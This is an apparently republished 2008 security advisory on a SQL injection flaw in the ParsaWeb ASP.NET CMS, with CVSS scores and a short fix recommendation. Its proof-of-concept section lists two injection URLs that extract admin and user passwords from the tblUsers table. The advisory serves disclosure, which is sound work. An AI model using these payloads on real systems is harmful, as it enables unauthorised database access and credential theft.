ParsaWeb CMS SQL Injection

2008-09-30 / 2008-10-01
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

########################## www.BugReport.ir ####################################### # # AmnPardaz Security Research Team # # Title: ParsaWeb CMS SQL Injection # Vendor: http://www.parsagostar.com # Demo: http://cms.parsagostar.com/ # Exploit: Available # Impact: High # Fix: N/A # Original advisory: http://www.bugreport.ir/index_53.htm ################################################################################### #################### 1. Description: #################### ParsaWeb is a commercial ASP.NET website and content management system. #################### 2. Vulnerabilities: #################### Input passed to the "id" parameter in default.aspx and txtSearch in search section are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. #################### 3. Exploits/POCs: #################### http://www.example.com/?page=page&id=-164 or 1=(select top 1 user_pass from tblUsers where user_name = 'admin') http://www.example.com/?page=Search Search:AmnPardaz%') union ALL select '1',user_name+':'+user_pass,'3','4','5','6','7','8','9','10',11 from tblUsers-- #################### 4. Solution: #################### Edit the source code to ensure that inputs are properly sanitized. #################### 5. Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top